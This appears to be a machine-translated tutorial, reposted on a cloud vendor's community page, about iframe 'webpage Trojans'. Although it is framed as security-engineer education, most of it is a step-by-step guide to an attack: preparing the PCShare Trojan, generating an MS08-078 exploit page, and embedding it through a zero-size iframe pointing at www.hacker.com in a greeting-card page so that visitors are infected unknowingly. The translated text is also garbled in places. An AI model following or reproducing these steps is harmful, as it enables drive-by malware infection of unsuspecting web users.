What is iframe asp. NET?

Source: Internet
Author: User

Security engineers are responsible for website security, LAN security, server security, etc, you need to know that webpage Trojans include IFRAME frame Trojans, JS file Trojans, camouflage Trojans, CSS Trojans, and ActiveX component Trojans, so that you can prevent them in a targeted manner, avoid security threats such as websites and servers. Next, let's take the first step as a security engineer to understand the details of the IFRAME framework and the corresponding preventive methods.

What is an IFRAME framework Trojan?

Currently, many methods and application methods have been developed for webpage Trojans. The IFRAME webpage frame Trojan is the most typical and basic method. It can be said that there is no IFRAME, most of webpage Trojans cannot be properly hidden, so that users are not aware of attacks.

What is IFRAME? IFRAME is a very common HTML language tag. It is mainly used to divide the left and right sides or up and down frames on a webpage interface, just like the picture in our TV. The Shanzhai search engine interface in Figure 2 is a typical IFRAME reference.

However, the IFRAME function is also cleverly used by hackers. In some seemingly normal webpages, hackers use a hidden frame with a length and width of 0, allows users to open webpage Trojans with vulnerability overflow without knowing it. This method is like opening a charging channel on a picture-in-picture TV, however, because the picture size of the paid channel is maliciously changed to 0, the TV viewers do not know that they have already opened the paid channel, even though they have not seen it, however, in fact, the paid channel is actually playing, and the user's usage fee will be collected.

IFRAME framework

Let's demonstrate how the IFRAME framework mounts Trojans.

Step 1: Prepare a handy Trojan, such as PCShare, which is easy to set and easy to use. Set related services, and finally generate the service control end used by the Trojan.

Step 2: use FTP to upload the Trojan to your website space and use NotePad to record the network path of the Trojan. Then use "MS08-078 web Trojan generator" to generate a malicious Web page with a MS08-078 vulnerability. Find a normal New Year Greeting Card webpage, save the webpage to your designated directory, and then adjust and modify the saved webpage using Web Designer or Dreamweaver webpage editing software, upload the image to your website space to check whether the image and other content are properly displayed.

Step 3: Open the modified Greeting Card Web page again, use IFRAME to mark the statement, embedded the generated MS08-078 web page into the Greeting Card Web page, embedded Trojan code is as follows:

 
 
  1. <iframe src=http://www.hacker.com/ms08078.html width=0 height=0> iframe> 

After this code is inserted into the greeting card webpage, we have completed the webpage Trojan operation. The user who browses the greeting card page, after seeing the greeting card page, also runs.

IFRAME flag uses the normal HTML language function to implement hidden Trojans. Currently, there is no good prevention method because it is a normal Web page function. You can only hope that anti-virus software and anti-trojan software will prevent the use of IFRAME to mark embedded overflow virus web pages. We recommend that you install third-party anti-trojan software after installing anti-virus software, for example, ruifeng and 360. What is IFRAME.

  1. Implementation of ASP. NET plug-in
  2. Overview ASP. NET Applications
  3. Introduction to ASP. NET 2.0 Data Binding
  4. ASP. NET prevents Java Script Injection attacks
  5. ASP. net mvc using T4

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.